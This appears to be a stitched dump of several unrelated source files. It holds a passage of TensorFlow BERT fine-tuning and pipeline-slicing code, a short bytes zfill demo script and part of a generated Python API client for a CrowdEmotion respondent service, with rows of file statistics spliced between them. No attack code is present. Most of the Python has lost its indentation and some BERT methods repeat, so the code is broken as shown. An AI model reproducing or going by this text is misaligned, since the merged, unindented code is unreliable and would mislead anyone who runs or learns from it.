next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
self.eval_metric = {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
def get_masked_lm_output(self, bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
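  # Worked example of the weighting above (illustrative only): with
  # per_example_loss = [2.0, 1.5, 0.0] and label_weights = [1.0, 1.0, 0.0]
  # (the last prediction is padding), loss = (2.0 + 1.5) / (2.0 + 1e-5) ~= 1.75,
  # so padded positions contribute nothing to the masked-LM loss.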
def get_next_sentence_output(self, bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def build_output_layer_regression(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=1,
activation_fn=None, #tf.nn.sigmoid
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = self.src_estimation
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.pow(self.src_prediction - self.labels, 2)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('loss', self.loss)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_classification(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=2,
activation_fn=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = tf.contrib.layers.softmax(self.src_estimation)[:, 1]
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.src_estimation, labels=self.labels)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_squad(self, is_training=False):
final_hidden = self.model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
# compute loss
seq_length = modeling.get_shape_list(self.input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
def def_loss():
start_positions = self.kwargs["start_positions"]
end_positions = self.kwargs["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
loss = (start_loss + end_loss) / 2.0
return loss
self.loss = def_loss()
def build_output_layer(self, is_training):
output_layer = self.model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [2], initializer=tf.zeros_initializer())
print('output_layer', output_layer.shape)
print('output_weights', output_weights.shape)
print('output_bias', output_bias.shape)
with tf.variable_scope("loss"):
if is_training:
# I.e., 0.1 dropout
output_layer = tf.nn.dropout(output_layer, keep_prob=0.9)
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
self.logits = logits
log_probs = tf.nn.log_softmax(self.logits)
print('logits', logits.shape)
one_hot_labels = tf.one_hot(self.labels, depth=2,
dtype=tf.float32)
self.per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
self.loss = tf.reduce_mean(self.per_example_loss)
self.predictions = tf.argmax(self.logits, axis=-1, output_type=tf.int32)
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
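# Hypothetical construction sketch for BertFinetune (tensor names below are
# placeholders/assumptions, not from the original training script):
#   model = BertFinetune('bert_config.json', max_seq_length=128, is_training=True,
#                        input_ids=input_ids, input_mask=input_mask,
#                        segment_ids=segment_ids, labels=labels,
#                        use_one_hot_embeddings=False, model_type='classification')
#   train_op = tf.train.AdamOptimizer(learning_rate=1e-5).minimize(model.loss)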
class BertFinetuneSlice(object):
"""
  Finetune method based on BERT, with the model partitioned into pipeline stages placed across multiple devices.
"""
def __init__(self, bert_config_file, max_seq_length, is_training,
input_ids, input_mask, segment_ids, labels, use_one_hot_embeddings,
model_type='classification', slice_devices="/device:GPU:0",
dep_outputs=None, kwargs=None):
bert_config = modeling_slice.BertConfig.from_json_file(bert_config_file)
if max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(max_seq_length, bert_config.max_position_embeddings))
self.model = modeling_slice.BertModelSlice(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
if not isinstance(slice_devices, list):
logging.info("SLICE DEVICES: ", slice_devices)
self.devices = slice_devices.split(",")
else:
self.devices = slice_devices
self.stages = self.model.stages
ndev = len(self.devices)
nstage = len(self.stages)
def calc_device(i):
# Bert-24
if nstage == 27:
# 11:13
return 0 if i < 13 else 1
# Bert-48
elif nstage == 51:
# 23:25
return 0 if i < 25 else 1
else:
print("Unrecognized nstage, only bert-24 and bert-48 are supported.")
sys.exit(0)
# idx = int((i+2) / ((nstage+1) / ndev + 1))
# return idx
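    # Placement summary (derived from calc_device above): for the 27-stage
    # BERT-24 split over two devices, stages 0-12 run on self.devices[0] and
    # stages 13-26 on self.devices[1]; for the 51-stage BERT-48 split the
    # boundary is at stage 25. stage_outputs below records the activation
    # handed across each device boundary so later pipeline logic can depend on it.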
self.stage_outputs = []
prev_output = input_ids
prev_device_idx = 0
for i in xrange(nstage):
device_idx = calc_device(i)
if (i == 0 or device_idx != prev_device_idx) and \
(dep_outputs is not None and dep_outputs[device_idx] is not None):
#print ("***DEPS***", dep_outputs[device_idx])
dep = dep_outputs[device_idx] if isinstance(dep_outputs[device_idx], list) else [dep_outputs[device_idx]]
with tf.control_dependencies(dep), tf.device(self.devices[device_idx]):
output = self.stages[i](prev_output)
if device_idx != prev_device_idx:
self.stage_outputs.append(prev_output)
prev_device_idx = device_idx
prev_output = output
continue
if device_idx != prev_device_idx:
self.stage_outputs.append(prev_output)
prev_device_idx = device_idx
#with tf.control_dependencies([prev_output]), tf.device(self.devices[device_idx]):
with tf.device(self.devices[device_idx]):
output = self.stages[i](prev_output)
prev_output = output
self.bert_config = bert_config
self.kwargs = kwargs
self.labels = labels
self.input_ids = input_ids
if model_type == 'classification':
self.build_output_layer_classification()
elif model_type == 'regression':
self.build_output_layer_regression()
elif model_type == 'mrc':
with tf.device(self.devices[device_idx]):
self.build_output_layer_squad()
self.stage_outputs.append(self.loss)
elif model_type == 'pretrain':
self.build_pretrain()
else:
raise ValueError("model_type should be one of ['classification', "
"'regression', pretrain', 'mrc'].")
self.saver = tf.train.Saver(
var_list=tf.global_variables(),
max_to_keep=2)
def restore(self, saver_directory, sess):
checkpoint = tf.train.latest_checkpoint(saver_directory)
if not checkpoint:
logging.info("Couldn't find trained model at %s." % saver_directory)
else:
logging.info('restore from {}'.format(checkpoint))
self.saver.restore(sess, checkpoint)
def save(self, saver_directory, sess, step=None):
logging.info("Save to %s." % saver_directory)
if step is not None:
self.saver.save(sess, saver_directory, global_step=step)
else:
self.saver.save(sess, saver_directory)
def build_pretrain(self):
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = self.get_masked_lm_output(
self.bert_config,
self.model.get_sequence_output(),
self.model.get_embedding_table(),
self.kwargs['masked_lm_positions'],
self.kwargs['masked_lm_ids'],
self.kwargs['masked_lm_weights'])
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = self.get_next_sentence_output(
self.bert_config,
self.model.get_pooled_output(),
self.kwargs['next_sentence_labels'])
self.loss = masked_lm_loss + next_sentence_loss
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(self.kwargs['masked_lm_ids'], [-1])
masked_lm_weights = tf.reshape(self.kwargs['masked_lm_weights'], [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(self.kwargs['next_sentence_labels'], [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
self.eval_metric = {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
def get_masked_lm_output(self, bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling_slice.get_activation(bert_config.hidden_act),
kernel_initializer=modeling_slice.create_initializer(
bert_config.initializer_range))
input_tensor = modeling_slice.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(self, bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling_slice.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def build_output_layer_regression(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=1,
activation_fn=None, #tf.nn.sigmoid
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = self.src_estimation
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.pow(self.src_prediction - self.labels, 2)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('loss', self.loss)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_classification(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=2,
activation_fn=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = tf.contrib.layers.softmax(self.src_estimation)[:, 1]
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.src_estimation, labels=self.labels)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_squad(self, is_training=False):
final_hidden = self.model.get_sequence_output()
final_hidden_shape = modeling_slice.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
with tf.variable_scope("cls/squad", reuse=tf.AUTO_REUSE):
output_weights = tf.get_variable(
"output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
# compute loss
seq_length = modeling_slice.get_shape_list(self.input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
def def_loss():
start_positions = self.kwargs["start_positions"]
end_positions = self.kwargs["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
loss = (start_loss + end_loss) / 2.0
return loss
self.loss = def_loss()
def build_output_layer(self, is_training):
output_layer = self.model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [2], initializer=tf.zeros_initializer())
print('output_layer', output_layer.shape)
print('output_weights', output_weights.shape)
print('output_bias', output_bias.shape)
with tf.variable_scope("loss"):
if is_training:
# I.e., 0.1 dropout
output_layer = tf.nn.dropout(output_layer, keep_prob=0.9)
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
self.logits = logits
log_probs = tf.nn.log_softmax(self.logits)
print('logits', logits.shape)
one_hot_labels = tf.one_hot(self.labels, depth=2,
dtype=tf.float32)
self.per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
self.loss = tf.reduce_mean(self.per_example_loss)
self.predictions = tf.argmax(self.logits, axis=-1, output_type=tf.int32)
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
| 43.339947 | 117 | 0.635648 | 4,005 | 32,765 | 4.897878 | 0.085144 | 0.026101 | 0.008157 | 0.012592 | 0.885808 | 0.871533 | 0.858993 | 0.857157 | 0.857157 | 0.844515 | 0 | 0.010475 | 0.27157 | 32,765 | 755 | 118 | 43.397351 | 0.811413 | 0.078956 | 0 | 0.832452 | 0 | 0 | 0.057486 | 0.002971 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.014109 | 0 | 0.08642 | 0.042328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1adf9ed69c7aab99d4a8e06e355d660e1f43e607 | 298 | py | Python | 03/03/zfill.py | pylangstudy/201708 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | [
"CC0-1.0"
] | null | null | null | 03/03/zfill.py | pylangstudy/201708 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | [
"CC0-1.0"
] | 39 | 2017-07-31T22:54:01.000Z | 2017-08-31T00:19:03.000Z | 03/03/zfill.py | pylangstudy/201708 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | [
"CC0-1.0"
] | null | null | null | print(b'12'.zfill(8))
print(b'-12'.zfill(8))
print(b'-12.3'.zfill(8))
print(b'+12.3'.zfill(8))
print(b'z12.3x'.zfill(8))
print(bytearray(b'12').zfill(8))
print(bytearray(b'-12').zfill(8))
print(bytearray(b'-12.3').zfill(8))
print(bytearray(b'+12.3').zfill(8))
print(bytearray(b'z12.3x').zfill(8))
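# Expected output of the calls above (bytes/bytearray zero-fill to width 8,
# keeping any leading sign in place):
#   b'00000012'
#   b'-0000012'
#   b'-00012.3'
#   b'+00012.3'
#   b'00z12.3x'
#   bytearray(b'00000012')
#   bytearray(b'-0000012')
#   bytearray(b'-00012.3')
#   bytearray(b'+00012.3')
#   bytearray(b'00z12.3x')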
| 24.833333 | 36 | 0.654362 | 61 | 298 | 3.196721 | 0.147541 | 0.307692 | 0.507692 | 0.512821 | 1 | 0.917949 | 0.917949 | 0.917949 | 0.805128 | 0.805128 | 0 | 0.125436 | 0.036913 | 298 | 11 | 37 | 27.090909 | 0.554007 | 0 | 0 | 0 | 0 | 0 | 0.14094 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
1aeed00c1f3e3390988151d2ad63b93e9805fa6e | 34,028 | py | Python | crowdemotion_api_client_python/apis/respondent_api.py | CrowdEmotion/crowdemotion-api-client-python | b5ec57030e36d2b2c32cc5a43b804d7a34401c16 | [
"Apache-2.0"
] | 1 | 2018-06-14T05:12:54.000Z | 2018-06-14T05:12:54.000Z | python/crowdemotion_api_client_python/apis/respondent_api.py | CrowdEmotion/crowdemotion-api-clients-examples | 9e4bd38279399e5694cf3cec6cc7fb0b3149bc39 | [
"MIT"
] | null | null | null | python/crowdemotion_api_client_python/apis/respondent_api.py | CrowdEmotion/crowdemotion-api-clients-examples | 9e4bd38279399e5694cf3cec6cc7fb0b3149bc39 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
    CrowdEmotion API v1
CrowdEmotion API
OpenAPI spec version: 1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class RespondentApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def respondent_get(self, research_id, **kwargs):
"""
Find all Respondents of a Research
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_get(research_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int research_id: Search by research id. (required)
:param int skip: The number of results to skip.
:param int limit: The maximum number of results to return.
:param str where: JSON formatted string.
:param str sort: Attribute used to sort results.
:return: list[Respondent]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_get_with_http_info(research_id, **kwargs)
else:
(data) = self.respondent_get_with_http_info(research_id, **kwargs)
return data
def respondent_get_with_http_info(self, research_id, **kwargs):
"""
Find all Respondents of a Research
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_get_with_http_info(research_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int research_id: Search by research id. (required)
:param int skip: The number of results to skip.
:param int limit: The maximum number of results to return.
:param str where: JSON formatted string.
:param str sort: Attribute used to sort results.
:return: list[Respondent]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['research_id', 'skip', 'limit', 'where', 'sort']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'research_id' is set
if ('research_id' not in params) or (params['research_id'] is None):
raise ValueError("Missing the required parameter `research_id` when calling `respondent_get`")
resource_path = '/respondent'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'research_id' in params:
query_params['research_id'] = params['research_id']
if 'skip' in params:
query_params['skip'] = params['skip']
if 'limit' in params:
query_params['limit'] = params['limit']
if 'where' in params:
query_params['where'] = params['where']
if 'sort' in params:
query_params['sort'] = params['sort']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Respondent]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_post(self, body, **kwargs):
"""
Create a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_post(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_post_with_http_info(body, **kwargs)
else:
(data) = self.respondent_post_with_http_info(body, **kwargs)
return data
def respondent_post_with_http_info(self, body, **kwargs):
"""
Create a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_post_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `respondent_post`")
resource_path = '/respondent'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Respondent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_delete(self, respondent_id, **kwargs):
"""
Delete a Respondent
<p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_delete(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
